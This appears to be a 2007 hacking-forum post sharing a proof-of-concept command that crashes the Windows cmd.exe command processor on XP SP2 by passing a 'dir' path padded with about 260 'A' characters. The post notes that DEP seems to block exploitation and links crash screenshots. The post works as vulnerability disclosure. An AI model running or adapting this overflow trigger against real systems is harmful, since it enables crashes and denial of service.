FORUM DARKERS

Segurança & Hacking => Bugs | Exploits | Vulnerabilidades => Topic started by: insanity on 01 de January , 2007, 08:20:30 PM

Title: Windows Command Processor CMD.EXE Buffer Overflow
Post by: insanity on 01 de January , 2007, 08:20:30 PM
Author: Gregory R. Panakka
Execute the following line in cmd.exe (copy-paste)..
tested on winxp sp2 (fully patched) on 2006/10/06/17.56

%COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"


(260 characters of 'A's)

Well, DEP (Data Execution Protection) comes into the picture and saves the day (???).

Haven't tried in Windows 2000 or Windows XP SP1 (or rather any other operating system).

Here are some screenshots....

(//http://www.infogreg.com/images/stories/cmdcrash1.JPG)

(//http://www.infogreg.com/images/stories/cmdcrash1.JPG)